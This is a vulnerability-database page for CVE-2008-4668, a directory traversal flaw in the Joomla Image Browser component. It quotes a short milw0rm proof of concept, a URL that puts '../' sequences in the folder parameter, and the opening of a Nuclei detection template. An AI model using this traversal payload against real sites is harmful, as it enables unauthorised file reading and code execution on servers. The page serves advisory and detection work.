CVE-2008-4668
published 2008-10-22CVE-2008-4668: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary…
PriorityP355critical9CVSS 2.0
AVNACLAuNCCIPAP
EXPLOIT
EPSS
21.48%
97.3th percentile
Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_imagebrowser | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
exploitdb·2008-09-28
CVE-2008-4668 Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
---
Joomla Imagebrowser File Inc.
Cr@zy_King / www.biyosecurity.com / sqL Lov3r'Z Crew Co. 2008
Down : http://www.joomlatr.org/index.php/component/remository/?func=fileinfo&id=129
FI : http://127.0.0.1/index.php?option=com_imagebrowser&folder=../../../../
Grtz : aLL My Friend'z ...
# milw0rm.com [2008-09-28]
Nuclei
Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
nuclei·CVSS 9.0
CVE-2008-4668 [CRITICAL] Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
Template:
id: CVE-2008-4668
info:
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
author: daffainfo
severity: critical
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthor
http://securityreason.com/securityalert/4464http://www.securityfocus.com/bid/31458https://exchange.xforce.ibmcloud.com/vulnerabilities/45490https://www.exploit-db.com/exploits/6618http://securityreason.com/securityalert/4464http://www.securityfocus.com/bid/31458https://exchange.xforce.ibmcloud.com/vulnerabilities/45490https://www.exploit-db.com/exploits/6618
2008-10-22
Published